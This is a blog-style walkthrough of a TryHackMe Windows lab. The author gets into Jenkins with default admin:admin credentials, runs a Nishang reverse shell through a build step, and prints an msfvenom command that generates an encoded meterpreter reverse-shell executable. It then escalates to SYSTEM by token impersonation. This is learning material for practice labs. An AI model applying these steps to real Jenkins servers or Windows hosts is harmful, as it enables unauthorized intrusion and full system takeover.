Introduction
This looks like another Windows machine. Truth be told, I am not sure how comfortable I am with popping Windows boxes. I have used Linux my whole life.
We see Jenkins and since I am a developer, I have seen Jenkins before. Let me try to explain the concept of Jenkins and CICD ( Continuous Integration Continuous Development) in a simple way.
1. We have developers who write code on their systems.
2. Once this code is developed, it is tested in different environments ( testing, prod, etc)
3. These testing environments are essentially servers on which these codes have to be deployed.
4. Developer commits a code on Github, a build is triggered in Jenkins, after which we get a unique build number, that can later be used by applications like UDeploy to deploy it on the server.
I am not sure if the target machine is going to use this info. But since I am blogging while solving, I am jotting down everything that is crossing my mind.
The introduction also talks about Nishang, something that I have heard of, but I have never used it before. Let’s start hacking :P
Scanning & Enumeration
Initially using ping or fping suggested that the target ip is down, but oftentimes windows machines drop ping packets.
We will need to add -Pn to skip host discovery and treat it as if the host is online.
Nmap Scan
nmap -sV -A -Pn 10.10.111.75
Observations
- Microsoft server IIS,
- there is a disallowed entry on port 80,
- port 8080 has something called Jetty 9.4.z
We do not see any other services. While we are analyzing this information, we should run a full port scan in case we missed some other service ( a good practice where making a lot of noise is not going to be an issue).
Enumeration
I usually like starting with enumerating the web service.
HTTP Enumeration
Looking at the page source there is no new information, robots.txt doesn’t exist on port 80. Looks like a dead end.
Let us try port 8080.
Now whenever I see a login page, I usually try admin: admin. Or some common passwords.
This time I got the nudge from the question on TryHackMe. The five-letter username and password gave away admin: admin for me.
As soon as we log in, we see the following page
After this, TryHackMe suggests
finding a feature of the tool that allows command execution.
Meanwhile, our scanning has completed and we find another port on the machine
Version Enumeration Table
Vulnerability Scanning
Jetty
We know the version information for 8080 here is Jetty 9.4.z
Searchsploit does not reveal any exploits as such.
Jenkins
Version — 2.190.1
Even this did not seem to give any meaningful outputs. At this point, I am not sure how to go ahead.
So I thought of creating a new project and looking at what options I have.
Chose a name, and free-style project, and click OK.
After clicking okay, we get a couple of configuration options. Under the `build` option, there is a drop-down menu to ‘Add build step’
We see a lot of options. We can try to execute shell, or as suggested by TryHackMe, use Nishang to get the initial shell.
Exploitation
We use the famous nishang scripts for this one!
We need a shell using ‘Invoke-PowerShellTcp.ps1’
once we have located that, we will start an HTTP server so that the batch script can download it from the attacker to the victim machine.
Attacker IP: 10.4.9.255
Victim IP: 10.10.111.75
4445 is the netcat listener, where we can get our shell.
Click on save, and once it is saved, let us build the project! We see that our script is successfully uploaded, and we get our first shell!
Got the user flag as well, it’s time to privesc!
Privesc
At this point TryHackMe wants us to switch shells, suggesting that switching to meterpreter will make Privesc easy for us.
Use msfvenom to create a windows meterpreter reverse shell using the following payload
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
Once we have generated the payload, let us start an Http server to pass on the payload to the target machine. Do not forget to start the listener using ‘multi/handler’ on Metasploit. Let us now download the payload on the target machine.
And we have our meterpreter up and running :P
Now we start talking about Privesc. Reading a little on TryHackMe gives us the following new information:
1. Windows uses tokens to ensure accounts have the right privileges.
2. LSASS.exe takes care of this authentication and tokens.
More information can be found here.
We see all privileges that we have using getprivs.
We now use Incognito, using load incognito
NT AUTHORITY\SYSTEM is like root on Windows Machine. But we only have impersonation token, hence we need to migrate to another process, usually system.exe is a good choice.
We migrate to service.exe using migrate 668
and we get the root flag.
Parting Thoughts
In this blog post, I have not tried to finish the room without using Metasploit. The main reason for that is,
1. I have no idea as of today, how to do it.
2. Being a newbie to Windows machines takes a toll on confidence
Hence I am just jotting this down in my notes, and understanding that how were we able to PrivEsc.
Thanks for reading and your valuable feedbacks are more than appreciated :)